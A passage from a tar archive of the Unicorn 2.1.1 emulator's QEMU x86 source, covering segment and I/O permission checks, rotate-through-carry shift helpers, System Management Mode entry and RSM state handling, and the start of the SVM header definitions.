selector1) { uint32_t e1, e2, eflags, selector; int rpl, dpl, cpl; selector = selector1 & 0xffff; eflags = cpu_cc_compute_all(env, CC_OP); if ((selector & 0xfffc) == 0) { goto fail; } if (load_segment_ra(env, &e1, &e2, selector, GETPC()) != 0) { goto fail; } if (!(e2 & DESC_S_MASK)) { goto fail; } rpl = selector & 3; dpl = (e2 >> DESC_DPL_SHIFT) & 3; cpl = env->hflags & HF_CPL_MASK; if (e2 & DESC_CS_MASK) { if (!(e2 & DESC_R_MASK)) { goto fail; } if (!(e2 & DESC_C_MASK)) { if (dpl < cpl || dpl < rpl) { goto fail; } } } else { if (dpl < cpl || dpl < rpl) { fail: CC_SRC = eflags & ~CC_Z; return; } } CC_SRC = eflags | CC_Z; } void helper_verw(CPUX86State *env, target_ulong selector1) { uint32_t e1, e2, eflags, selector; int rpl, dpl, cpl; selector = selector1 & 0xffff; eflags = cpu_cc_compute_all(env, CC_OP); if ((selector & 0xfffc) == 0) { goto fail; } if (load_segment_ra(env, &e1, &e2, selector, GETPC()) != 0) { goto fail; } if (!(e2 & DESC_S_MASK)) { goto fail; } rpl = selector & 3; dpl = (e2 >> DESC_DPL_SHIFT) & 3; cpl = env->hflags & HF_CPL_MASK; if (e2 & DESC_CS_MASK) { goto fail; } else { if (dpl < cpl || dpl < rpl) { goto fail; } if (!(e2 & DESC_W_MASK)) { fail: CC_SRC = eflags & ~CC_Z; return; } } CC_SRC = eflags | CC_Z; } void cpu_x86_load_seg(CPUX86State *env, int seg_reg, int selector) { if (!(env->cr[0] & CR0_PE_MASK) || (env->eflags & VM_MASK)) { int dpl = (env->eflags & VM_MASK) ? 3 : 0; selector &= 0xffff; cpu_x86_load_seg_cache(env, seg_reg, selector, (selector << 4), 0xffff, DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | DESC_A_MASK | (dpl << DESC_DPL_SHIFT)); } else { helper_load_seg(env, seg_reg, selector); } } /* check if Port I/O is allowed in TSS */ static inline void check_io(CPUX86State *env, int addr, int size, uintptr_t retaddr) { int io_offset, val, mask; /* TSS must be a valid 32 bit one */ if (!(env->tr.flags & DESC_P_MASK) || ((env->tr.flags >> DESC_TYPE_SHIFT) & 0xf) != 9 || env->tr.limit < 103) { goto fail; } io_offset = cpu_lduw_kernel_ra(env, env->tr.base + 0x66, retaddr); io_offset += (addr >> 3); /* Note: the check needs two bytes */ if ((io_offset + 1) > env->tr.limit) { goto fail; } val = cpu_lduw_kernel_ra(env, env->tr.base + io_offset, retaddr); val >>= (addr & 7); mask = (1 << size) - 1; /* all bits must be zero to allow the I/O */ if ((val & mask) != 0) { fail: raise_exception_err_ra(env, EXCP0D_GPF, 0, retaddr); } } void helper_check_iob(CPUX86State *env, uint32_t t0) { check_io(env, t0, 1, GETPC()); } void helper_check_iow(CPUX86State *env, uint32_t t0) { check_io(env, t0, 2, GETPC()); } void helper_check_iol(CPUX86State *env, uint32_t t0) { check_io(env, t0, 4, GETPC()); } 
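/*
 * Worked example of the I/O-permission-bitmap test performed by check_io()
 * above (standalone sketch, not part of the build): for an access to port
 * 0x3f8 with size 1, the relevant bit is bit (0x3f8 & 7) = 0 of bitmap
 * byte (0x3f8 >> 3) = 0x7f.  Two bytes are fetched because an access of
 * up to four ports may straddle a byte boundary.
 */
#if 0
#include <stdint.h>
static int io_allowed(const uint8_t *bitmap, int port, int size)
{
    /* same layout as the TSS bitmap walked by check_io() */
    uint16_t val = bitmap[port >> 3] |
                   (uint16_t)(bitmap[(port >> 3) + 1] << 8);
    int mask = (1 << size) - 1;
    return ((val >> (port & 7)) & mask) == 0; /* all bits clear => allowed */
}
#endif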
unicorn-2.1.1/qemu/target/i386/shift_helper_template.h
/*
 * x86 shift helpers
 *
 * Copyright (c) 2008 Fabrice Bellard
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

#define DATA_BITS (1 << (3 + SHIFT))
#define SHIFT_MASK (DATA_BITS - 1)
#if DATA_BITS <= 32
#define SHIFT1_MASK 0x1f
#else
#define SHIFT1_MASK 0x3f
#endif

#if DATA_BITS == 8
#define SUFFIX b
#define DATA_MASK 0xff
#elif DATA_BITS == 16
#define SUFFIX w
#define DATA_MASK 0xffff
#elif DATA_BITS == 32
#define SUFFIX l
#define DATA_MASK 0xffffffff
#elif DATA_BITS == 64
#define SUFFIX q
#define DATA_MASK 0xffffffffffffffffULL
#else
#error unhandled operand size
#endif

target_ulong glue(helper_rcl, SUFFIX)(CPUX86State *env, target_ulong t0,
                                      target_ulong t1)
{
    int count, eflags;
    target_ulong src;
    target_long res;

    count = t1 & SHIFT1_MASK;
#if DATA_BITS == 16
    count = rclw_table[count];
#elif DATA_BITS == 8
    count = rclb_table[count];
#endif
    if (count) {
        eflags = (int)env->cc_src;
        t0 &= DATA_MASK;
        src = t0;
        res = (t0 << count) | ((target_ulong)(eflags & CC_C) << (count - 1));
        if (count > 1) {
            res |= t0 >> (DATA_BITS + 1 - count);
        }
        t0 = res;
        env->cc_src = (eflags & ~(CC_C | CC_O)) |
            (lshift(src ^ t0, 11 - (DATA_BITS - 1)) & CC_O) |
            ((src >> (DATA_BITS - count)) & CC_C);
    }
    return t0;
}

target_ulong glue(helper_rcr, SUFFIX)(CPUX86State *env, target_ulong t0,
                                      target_ulong t1)
{
    int count, eflags;
    target_ulong src;
    target_long res;

    count = t1 & SHIFT1_MASK;
#if DATA_BITS == 16
    count = rclw_table[count];
#elif DATA_BITS == 8
    count = rclb_table[count];
#endif
    if (count) {
        eflags = (int)env->cc_src;
        t0 &= DATA_MASK;
        src = t0;
        res = (t0 >> count) |
            ((target_ulong)(eflags & CC_C) << (DATA_BITS - count));
        if (count > 1) {
            res |= t0 << (DATA_BITS + 1 - count);
        }
        t0 = res;
        env->cc_src = (eflags & ~(CC_C | CC_O)) |
            (lshift(src ^ t0, 11 - (DATA_BITS - 1)) & CC_O) |
            ((src >> (count - 1)) & CC_C);
    }
    return t0;
}

#undef DATA_BITS
#undef SHIFT_MASK
#undef SHIFT1_MASK
#undef DATA_TYPE
#undef DATA_MASK
#undef SUFFIX
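/*
 * How this template is consumed (sketch following QEMU's usual pattern;
 * the actual including file in this tree is an assumption): the includer
 * defines SHIFT and re-includes this header once per operand width, so
 * glue(helper_rcl, SUFFIX) expands to helper_rclb, helper_rclw,
 * helper_rcll and, for x86_64, helper_rclq.
 */
#if 0
#define SHIFT 0 /* DATA_BITS = 1 << (3 + 0) = 8 -> helper_rclb/rcrb */
#include "shift_helper_template.h"
#undef SHIFT
#define SHIFT 1 /* 16 bit -> helper_rclw/rcrw */
#include "shift_helper_template.h"
#undef SHIFT
#define SHIFT 2 /* 32 bit -> helper_rcll/rcrl */
#include "shift_helper_template.h"
#undef SHIFT
#ifdef TARGET_X86_64
#define SHIFT 3 /* 64 bit -> helper_rclq/rcrq */
#include "shift_helper_template.h"
#undef SHIFT
#endif
#endif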
���������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/i386/smm_helper.c���������������������������������������������������������0000664�0000000�0000000�00000031474�14675241067�0020442�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * x86 SMM helpers * * Copyright (c) 2003 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" /* SMM support */ #ifdef TARGET_X86_64 #define SMM_REVISION_ID 0x00020064 #else #define SMM_REVISION_ID 0x00020000 #endif void do_smm_enter(X86CPU *cpu) { CPUX86State *env = &cpu->env; CPUState *cs = CPU(cpu); target_ulong sm_state; SegmentCache *dt; int i, offset; // qemu_log_mask(CPU_LOG_INT, "SMM: enter\n"); // log_cpu_state_mask(CPU_LOG_INT, CPU(cpu), CPU_DUMP_CCOP); env->msr_smi_count++; env->hflags |= HF_SMM_MASK; if (env->hflags2 & HF2_NMI_MASK) { env->hflags2 |= HF2_SMM_INSIDE_NMI_MASK; } else { env->hflags2 |= HF2_NMI_MASK; } sm_state = env->smbase + 0x8000; #ifdef TARGET_X86_64 for (i = 0; i < 6; i++) { dt = &env->segs[i]; offset = 0x7e00 + i * 16; x86_stw_phys(cs, sm_state + offset, dt->selector); x86_stw_phys(cs, sm_state + offset + 2, (dt->flags >> 8) & 0xf0ff); x86_stl_phys(cs, sm_state + offset + 4, dt->limit); x86_stq_phys(cs, sm_state + offset + 8, dt->base); } x86_stq_phys(cs, sm_state + 0x7e68, env->gdt.base); x86_stl_phys(cs, sm_state + 0x7e64, env->gdt.limit); x86_stw_phys(cs, sm_state + 0x7e70, env->ldt.selector); x86_stq_phys(cs, sm_state + 0x7e78, env->ldt.base); x86_stl_phys(cs, sm_state + 0x7e74, env->ldt.limit); x86_stw_phys(cs, sm_state + 0x7e72, (env->ldt.flags >> 8) & 0xf0ff); x86_stq_phys(cs, sm_state + 0x7e88, env->idt.base); x86_stl_phys(cs, sm_state + 0x7e84, env->idt.limit); x86_stw_phys(cs, sm_state + 0x7e90, env->tr.selector); x86_stq_phys(cs, sm_state + 0x7e98, env->tr.base); x86_stl_phys(cs, sm_state + 0x7e94, env->tr.limit); x86_stw_phys(cs, sm_state + 0x7e92, (env->tr.flags >> 8) & 0xf0ff); /* ??? Vol 1, 16.5.6 Intel MPX and SMM says that IA32_BNDCFGS is saved at offset 7ED0. Vol 3, 34.4.1.1, Table 32-2, has 7EA0-7ED7 as "reserved". What's this, and what's really supposed to happen? 
*/ x86_stq_phys(cs, sm_state + 0x7ed0, env->efer); x86_stq_phys(cs, sm_state + 0x7ff8, env->regs[R_EAX]); x86_stq_phys(cs, sm_state + 0x7ff0, env->regs[R_ECX]); x86_stq_phys(cs, sm_state + 0x7fe8, env->regs[R_EDX]); x86_stq_phys(cs, sm_state + 0x7fe0, env->regs[R_EBX]); x86_stq_phys(cs, sm_state + 0x7fd8, env->regs[R_ESP]); x86_stq_phys(cs, sm_state + 0x7fd0, env->regs[R_EBP]); x86_stq_phys(cs, sm_state + 0x7fc8, env->regs[R_ESI]); x86_stq_phys(cs, sm_state + 0x7fc0, env->regs[R_EDI]); for (i = 8; i < 16; i++) { x86_stq_phys(cs, sm_state + 0x7ff8 - i * 8, env->regs[i]); } x86_stq_phys(cs, sm_state + 0x7f78, env->eip); x86_stl_phys(cs, sm_state + 0x7f70, cpu_compute_eflags(env)); x86_stl_phys(cs, sm_state + 0x7f68, env->dr[6]); x86_stl_phys(cs, sm_state + 0x7f60, env->dr[7]); x86_stl_phys(cs, sm_state + 0x7f48, env->cr[4]); x86_stq_phys(cs, sm_state + 0x7f50, env->cr[3]); x86_stl_phys(cs, sm_state + 0x7f58, env->cr[0]); x86_stl_phys(cs, sm_state + 0x7efc, SMM_REVISION_ID); x86_stl_phys(cs, sm_state + 0x7f00, env->smbase); #else x86_stl_phys(cs, sm_state + 0x7ffc, env->cr[0]); x86_stl_phys(cs, sm_state + 0x7ff8, env->cr[3]); x86_stl_phys(cs, sm_state + 0x7ff4, cpu_compute_eflags(env)); x86_stl_phys(cs, sm_state + 0x7ff0, env->eip); x86_stl_phys(cs, sm_state + 0x7fec, env->regs[R_EDI]); x86_stl_phys(cs, sm_state + 0x7fe8, env->regs[R_ESI]); x86_stl_phys(cs, sm_state + 0x7fe4, env->regs[R_EBP]); x86_stl_phys(cs, sm_state + 0x7fe0, env->regs[R_ESP]); x86_stl_phys(cs, sm_state + 0x7fdc, env->regs[R_EBX]); x86_stl_phys(cs, sm_state + 0x7fd8, env->regs[R_EDX]); x86_stl_phys(cs, sm_state + 0x7fd4, env->regs[R_ECX]); x86_stl_phys(cs, sm_state + 0x7fd0, env->regs[R_EAX]); x86_stl_phys(cs, sm_state + 0x7fcc, env->dr[6]); x86_stl_phys(cs, sm_state + 0x7fc8, env->dr[7]); x86_stl_phys(cs, sm_state + 0x7fc4, env->tr.selector); x86_stl_phys(cs, sm_state + 0x7f64, env->tr.base); x86_stl_phys(cs, sm_state + 0x7f60, env->tr.limit); x86_stl_phys(cs, sm_state + 0x7f5c, (env->tr.flags >> 8) & 0xf0ff); x86_stl_phys(cs, sm_state + 0x7fc0, env->ldt.selector); x86_stl_phys(cs, sm_state + 0x7f80, env->ldt.base); x86_stl_phys(cs, sm_state + 0x7f7c, env->ldt.limit); x86_stl_phys(cs, sm_state + 0x7f78, (env->ldt.flags >> 8) & 0xf0ff); x86_stl_phys(cs, sm_state + 0x7f74, env->gdt.base); x86_stl_phys(cs, sm_state + 0x7f70, env->gdt.limit); x86_stl_phys(cs, sm_state + 0x7f58, env->idt.base); x86_stl_phys(cs, sm_state + 0x7f54, env->idt.limit); for (i = 0; i < 6; i++) { dt = &env->segs[i]; if (i < 3) { offset = 0x7f84 + i * 12; } else { offset = 0x7f2c + (i - 3) * 12; } x86_stl_phys(cs, sm_state + 0x7fa8 + i * 4, dt->selector); x86_stl_phys(cs, sm_state + offset + 8, dt->base); x86_stl_phys(cs, sm_state + offset + 4, dt->limit); x86_stl_phys(cs, sm_state + offset, (dt->flags >> 8) & 0xf0ff); } x86_stl_phys(cs, sm_state + 0x7f14, env->cr[4]); x86_stl_phys(cs, sm_state + 0x7efc, SMM_REVISION_ID); x86_stl_phys(cs, sm_state + 0x7ef8, env->smbase); #endif /* init SMM cpu state */ #ifdef TARGET_X86_64 cpu_load_efer(env, 0); #endif cpu_load_eflags(env, 0, ~(CC_O | CC_S | CC_Z | CC_A | CC_P | CC_C | DF_MASK)); env->eip = 0x00008000; cpu_x86_update_cr0(env, env->cr[0] & ~(CR0_PE_MASK | CR0_EM_MASK | CR0_TS_MASK | CR0_PG_MASK)); cpu_x86_update_cr4(env, 0); env->dr[7] = 0x00000400; cpu_x86_load_seg_cache(env, R_CS, (env->smbase >> 4) & 0xffff, env->smbase, 0xffffffff, DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | DESC_G_MASK | DESC_A_MASK); cpu_x86_load_seg_cache(env, R_DS, 0, 0, 0xffffffff, DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | 
DESC_G_MASK | DESC_A_MASK); cpu_x86_load_seg_cache(env, R_ES, 0, 0, 0xffffffff, DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | DESC_G_MASK | DESC_A_MASK); cpu_x86_load_seg_cache(env, R_SS, 0, 0, 0xffffffff, DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | DESC_G_MASK | DESC_A_MASK); cpu_x86_load_seg_cache(env, R_FS, 0, 0, 0xffffffff, DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | DESC_G_MASK | DESC_A_MASK); cpu_x86_load_seg_cache(env, R_GS, 0, 0, 0xffffffff, DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | DESC_G_MASK | DESC_A_MASK); } void helper_rsm(CPUX86State *env) { CPUState *cs = env_cpu(env); target_ulong sm_state; int i, offset; uint32_t val; sm_state = env->smbase + 0x8000; #ifdef TARGET_X86_64 cpu_load_efer(env, x86_ldq_phys(cs, sm_state + 0x7ed0)); env->gdt.base = x86_ldq_phys(cs, sm_state + 0x7e68); env->gdt.limit = x86_ldl_phys(cs, sm_state + 0x7e64); env->ldt.selector = x86_lduw_phys(cs, sm_state + 0x7e70); env->ldt.base = x86_ldq_phys(cs, sm_state + 0x7e78); env->ldt.limit = x86_ldl_phys(cs, sm_state + 0x7e74); env->ldt.flags = (x86_lduw_phys(cs, sm_state + 0x7e72) & 0xf0ff) << 8; env->idt.base = x86_ldq_phys(cs, sm_state + 0x7e88); env->idt.limit = x86_ldl_phys(cs, sm_state + 0x7e84); env->tr.selector = x86_lduw_phys(cs, sm_state + 0x7e90); env->tr.base = x86_ldq_phys(cs, sm_state + 0x7e98); env->tr.limit = x86_ldl_phys(cs, sm_state + 0x7e94); env->tr.flags = (x86_lduw_phys(cs, sm_state + 0x7e92) & 0xf0ff) << 8; env->regs[R_EAX] = x86_ldq_phys(cs, sm_state + 0x7ff8); env->regs[R_ECX] = x86_ldq_phys(cs, sm_state + 0x7ff0); env->regs[R_EDX] = x86_ldq_phys(cs, sm_state + 0x7fe8); env->regs[R_EBX] = x86_ldq_phys(cs, sm_state + 0x7fe0); env->regs[R_ESP] = x86_ldq_phys(cs, sm_state + 0x7fd8); env->regs[R_EBP] = x86_ldq_phys(cs, sm_state + 0x7fd0); env->regs[R_ESI] = x86_ldq_phys(cs, sm_state + 0x7fc8); env->regs[R_EDI] = x86_ldq_phys(cs, sm_state + 0x7fc0); for (i = 8; i < 16; i++) { env->regs[i] = x86_ldq_phys(cs, sm_state + 0x7ff8 - i * 8); } env->eip = x86_ldq_phys(cs, sm_state + 0x7f78); cpu_load_eflags(env, x86_ldl_phys(cs, sm_state + 0x7f70), ~(CC_O | CC_S | CC_Z | CC_A | CC_P | CC_C | DF_MASK)); env->dr[6] = x86_ldl_phys(cs, sm_state + 0x7f68); env->dr[7] = x86_ldl_phys(cs, sm_state + 0x7f60); cpu_x86_update_cr4(env, x86_ldl_phys(cs, sm_state + 0x7f48)); cpu_x86_update_cr3(env, x86_ldq_phys(cs, sm_state + 0x7f50)); cpu_x86_update_cr0(env, x86_ldl_phys(cs, sm_state + 0x7f58)); for (i = 0; i < 6; i++) { offset = 0x7e00 + i * 16; cpu_x86_load_seg_cache(env, i, x86_lduw_phys(cs, sm_state + offset), x86_ldq_phys(cs, sm_state + offset + 8), x86_ldl_phys(cs, sm_state + offset + 4), (x86_lduw_phys(cs, sm_state + offset + 2) & 0xf0ff) << 8); } val = x86_ldl_phys(cs, sm_state + 0x7efc); /* revision ID */ if (val & 0x20000) { env->smbase = x86_ldl_phys(cs, sm_state + 0x7f00); } #else cpu_x86_update_cr0(env, x86_ldl_phys(cs, sm_state + 0x7ffc)); cpu_x86_update_cr3(env, x86_ldl_phys(cs, sm_state + 0x7ff8)); cpu_load_eflags(env, x86_ldl_phys(cs, sm_state + 0x7ff4), ~(CC_O | CC_S | CC_Z | CC_A | CC_P | CC_C | DF_MASK)); env->eip = x86_ldl_phys(cs, sm_state + 0x7ff0); env->regs[R_EDI] = x86_ldl_phys(cs, sm_state + 0x7fec); env->regs[R_ESI] = x86_ldl_phys(cs, sm_state + 0x7fe8); env->regs[R_EBP] = x86_ldl_phys(cs, sm_state + 0x7fe4); env->regs[R_ESP] = x86_ldl_phys(cs, sm_state + 0x7fe0); env->regs[R_EBX] = x86_ldl_phys(cs, sm_state + 0x7fdc); env->regs[R_EDX] = x86_ldl_phys(cs, sm_state + 0x7fd8); env->regs[R_ECX] = x86_ldl_phys(cs, sm_state + 0x7fd4); env->regs[R_EAX] = x86_ldl_phys(cs, sm_state + 0x7fd0); 
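/* Note: each load above mirrors a store made by do_smm_enter() at the same
 * SMRAM offset (for this 32-bit layout, 0x7fd0..0x7ffc hold EAX..CR0), so
 * RSM restores exactly the state image that SMM entry saved. */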
env->dr[6] = x86_ldl_phys(cs, sm_state + 0x7fcc); env->dr[7] = x86_ldl_phys(cs, sm_state + 0x7fc8); env->tr.selector = x86_ldl_phys(cs, sm_state + 0x7fc4) & 0xffff; env->tr.base = x86_ldl_phys(cs, sm_state + 0x7f64); env->tr.limit = x86_ldl_phys(cs, sm_state + 0x7f60); env->tr.flags = (x86_ldl_phys(cs, sm_state + 0x7f5c) & 0xf0ff) << 8; env->ldt.selector = x86_ldl_phys(cs, sm_state + 0x7fc0) & 0xffff; env->ldt.base = x86_ldl_phys(cs, sm_state + 0x7f80); env->ldt.limit = x86_ldl_phys(cs, sm_state + 0x7f7c); env->ldt.flags = (x86_ldl_phys(cs, sm_state + 0x7f78) & 0xf0ff) << 8; env->gdt.base = x86_ldl_phys(cs, sm_state + 0x7f74); env->gdt.limit = x86_ldl_phys(cs, sm_state + 0x7f70); env->idt.base = x86_ldl_phys(cs, sm_state + 0x7f58); env->idt.limit = x86_ldl_phys(cs, sm_state + 0x7f54); for (i = 0; i < 6; i++) { if (i < 3) { offset = 0x7f84 + i * 12; } else { offset = 0x7f2c + (i - 3) * 12; } cpu_x86_load_seg_cache(env, i, x86_ldl_phys(cs, sm_state + 0x7fa8 + i * 4) & 0xffff, x86_ldl_phys(cs, sm_state + offset + 8), x86_ldl_phys(cs, sm_state + offset + 4), (x86_ldl_phys(cs, sm_state + offset) & 0xf0ff) << 8); } cpu_x86_update_cr4(env, x86_ldl_phys(cs, sm_state + 0x7f14)); val = x86_ldl_phys(cs, sm_state + 0x7efc); /* revision ID */ if (val & 0x20000) { env->smbase = x86_ldl_phys(cs, sm_state + 0x7ef8); } #endif if ((env->hflags2 & HF2_SMM_INSIDE_NMI_MASK) == 0) { env->hflags2 &= ~HF2_NMI_MASK; } env->hflags2 &= ~HF2_SMM_INSIDE_NMI_MASK; env->hflags &= ~HF_SMM_MASK; // qemu_log_mask(CPU_LOG_INT, "SMM: after RSM\n"); // log_cpu_state_mask(CPU_LOG_INT, CPU(cpu), CPU_DUMP_CCOP); } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/i386/svm.h����������������������������������������������������������������0000664�0000000�0000000�00000014211�14675241067�0017107�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef SVM_H #define SVM_H #include "qemu/compiler.h" #define TLB_CONTROL_DO_NOTHING 0 #define TLB_CONTROL_FLUSH_ALL_ASID 1 #define V_TPR_MASK 0x0f #define V_IRQ_SHIFT 8 #define V_IRQ_MASK (1 << V_IRQ_SHIFT) #define V_INTR_PRIO_SHIFT 16 #define V_INTR_PRIO_MASK (0x0f << V_INTR_PRIO_SHIFT) #define V_IGN_TPR_SHIFT 20 #define V_IGN_TPR_MASK (1 << V_IGN_TPR_SHIFT) #define V_INTR_MASKING_SHIFT 24 #define V_INTR_MASKING_MASK (1 << V_INTR_MASKING_SHIFT) #define SVM_INTERRUPT_SHADOW_MASK 1 #define SVM_IOIO_STR_SHIFT 2 #define SVM_IOIO_REP_SHIFT 3 #define SVM_IOIO_SIZE_SHIFT 4 #define SVM_IOIO_ASIZE_SHIFT 7 #define SVM_IOIO_TYPE_MASK 1 #define SVM_IOIO_STR_MASK (1 << SVM_IOIO_STR_SHIFT) #define SVM_IOIO_REP_MASK (1 << SVM_IOIO_REP_SHIFT) #define SVM_IOIO_SIZE_MASK (7 << SVM_IOIO_SIZE_SHIFT) #define SVM_IOIO_ASIZE_MASK (7 << SVM_IOIO_ASIZE_SHIFT) #define SVM_EVTINJ_VEC_MASK 0xff #define SVM_EVTINJ_TYPE_SHIFT 8 #define SVM_EVTINJ_TYPE_MASK (7 << SVM_EVTINJ_TYPE_SHIFT) #define SVM_EVTINJ_TYPE_INTR (0 << SVM_EVTINJ_TYPE_SHIFT) #define SVM_EVTINJ_TYPE_NMI (2 << SVM_EVTINJ_TYPE_SHIFT) #define SVM_EVTINJ_TYPE_EXEPT (3 << SVM_EVTINJ_TYPE_SHIFT) #define SVM_EVTINJ_TYPE_SOFT (4 << SVM_EVTINJ_TYPE_SHIFT) #define SVM_EVTINJ_VALID (1 << 31) 
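/* Layout of the EVENTINJ encoding built from the SVM_EVTINJ_* masks: bits
 * 7:0 hold the vector, bits 10:8 the event type, bit 11 requests error-code
 * delivery and bit 31 marks the field valid.  Illustrative sketch of
 * injecting a #GP (vector 13) with an error code, values hypothetical:
 *
 *     uint32_t event_inj = 13 | SVM_EVTINJ_TYPE_EXEPT |
 *                          SVM_EVTINJ_VALID | SVM_EVTINJ_VALID_ERR;
 */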
#define SVM_EVTINJ_VALID_ERR (1 << 11) #define SVM_EXITINTINFO_VEC_MASK SVM_EVTINJ_VEC_MASK #define SVM_EXITINTINFO_TYPE_INTR SVM_EVTINJ_TYPE_INTR #define SVM_EXITINTINFO_TYPE_NMI SVM_EVTINJ_TYPE_NMI #define SVM_EXITINTINFO_TYPE_EXEPT SVM_EVTINJ_TYPE_EXEPT #define SVM_EXITINTINFO_TYPE_SOFT SVM_EVTINJ_TYPE_SOFT #define SVM_EXITINTINFO_VALID SVM_EVTINJ_VALID #define SVM_EXITINTINFO_VALID_ERR SVM_EVTINJ_VALID_ERR #define SVM_EXIT_READ_CR0 0x000 #define SVM_EXIT_READ_CR3 0x003 #define SVM_EXIT_READ_CR4 0x004 #define SVM_EXIT_READ_CR8 0x008 #define SVM_EXIT_WRITE_CR0 0x010 #define SVM_EXIT_WRITE_CR3 0x013 #define SVM_EXIT_WRITE_CR4 0x014 #define SVM_EXIT_WRITE_CR8 0x018 #define SVM_EXIT_READ_DR0 0x020 #define SVM_EXIT_READ_DR1 0x021 #define SVM_EXIT_READ_DR2 0x022 #define SVM_EXIT_READ_DR3 0x023 #define SVM_EXIT_READ_DR4 0x024 #define SVM_EXIT_READ_DR5 0x025 #define SVM_EXIT_READ_DR6 0x026 #define SVM_EXIT_READ_DR7 0x027 #define SVM_EXIT_WRITE_DR0 0x030 #define SVM_EXIT_WRITE_DR1 0x031 #define SVM_EXIT_WRITE_DR2 0x032 #define SVM_EXIT_WRITE_DR3 0x033 #define SVM_EXIT_WRITE_DR4 0x034 #define SVM_EXIT_WRITE_DR5 0x035 #define SVM_EXIT_WRITE_DR6 0x036 #define SVM_EXIT_WRITE_DR7 0x037 #define SVM_EXIT_EXCP_BASE 0x040 #define SVM_EXIT_INTR 0x060 #define SVM_EXIT_NMI 0x061 #define SVM_EXIT_SMI 0x062 #define SVM_EXIT_INIT 0x063 #define SVM_EXIT_VINTR 0x064 #define SVM_EXIT_CR0_SEL_WRITE 0x065 #define SVM_EXIT_IDTR_READ 0x066 #define SVM_EXIT_GDTR_READ 0x067 #define SVM_EXIT_LDTR_READ 0x068 #define SVM_EXIT_TR_READ 0x069 #define SVM_EXIT_IDTR_WRITE 0x06a #define SVM_EXIT_GDTR_WRITE 0x06b #define SVM_EXIT_LDTR_WRITE 0x06c #define SVM_EXIT_TR_WRITE 0x06d #define SVM_EXIT_RDTSC 0x06e #define SVM_EXIT_RDPMC 0x06f #define SVM_EXIT_PUSHF 0x070 #define SVM_EXIT_POPF 0x071 #define SVM_EXIT_CPUID 0x072 #define SVM_EXIT_RSM 0x073 #define SVM_EXIT_IRET 0x074 #define SVM_EXIT_SWINT 0x075 #define SVM_EXIT_INVD 0x076 #define SVM_EXIT_PAUSE 0x077 #define SVM_EXIT_HLT 0x078 #define SVM_EXIT_INVLPG 0x079 #define SVM_EXIT_INVLPGA 0x07a #define SVM_EXIT_IOIO 0x07b #define SVM_EXIT_MSR 0x07c #define SVM_EXIT_TASK_SWITCH 0x07d #define SVM_EXIT_FERR_FREEZE 0x07e #define SVM_EXIT_SHUTDOWN 0x07f #define SVM_EXIT_VMRUN 0x080 #define SVM_EXIT_VMMCALL 0x081 #define SVM_EXIT_VMLOAD 0x082 #define SVM_EXIT_VMSAVE 0x083 #define SVM_EXIT_STGI 0x084 #define SVM_EXIT_CLGI 0x085 #define SVM_EXIT_SKINIT 0x086 #define SVM_EXIT_RDTSCP 0x087 #define SVM_EXIT_ICEBP 0x088 #define SVM_EXIT_WBINVD 0x089 /* only included in documentation, maybe wrong */ #define SVM_EXIT_MONITOR 0x08a #define SVM_EXIT_MWAIT 0x08b #define SVM_EXIT_NPF 0x400 #define SVM_EXIT_ERR -1 #define SVM_CR0_SELECTIVE_MASK (1 << 3 | 1) /* TS and MP */ #define SVM_NPT_ENABLED (1 << 0) #define SVM_NPT_PAE (1 << 0) #define SVM_NPT_LMA (1 << 1) #define SVM_NPT_NXE (1 << 2) #define SVM_NPTEXIT_P (1ULL << 0) #define SVM_NPTEXIT_RW (1ULL << 1) #define SVM_NPTEXIT_US (1ULL << 2) #define SVM_NPTEXIT_RSVD (1ULL << 3) #define SVM_NPTEXIT_ID (1ULL << 4) #define SVM_NPTEXIT_GPA (1ULL << 32) #define SVM_NPTEXIT_GPT (1ULL << 33) QEMU_PACK(struct vmcb_control_area { uint16_t intercept_cr_read; uint16_t intercept_cr_write; uint16_t intercept_dr_read; uint16_t intercept_dr_write; uint32_t intercept_exceptions; uint64_t intercept; uint8_t reserved_1[44]; uint64_t iopm_base_pa; uint64_t msrpm_base_pa; uint64_t tsc_offset; uint32_t asid; uint8_t tlb_ctl; uint8_t reserved_2[3]; uint32_t int_ctl; uint32_t int_vector; uint32_t int_state; uint8_t reserved_3[4]; uint64_t exit_code; uint64_t 
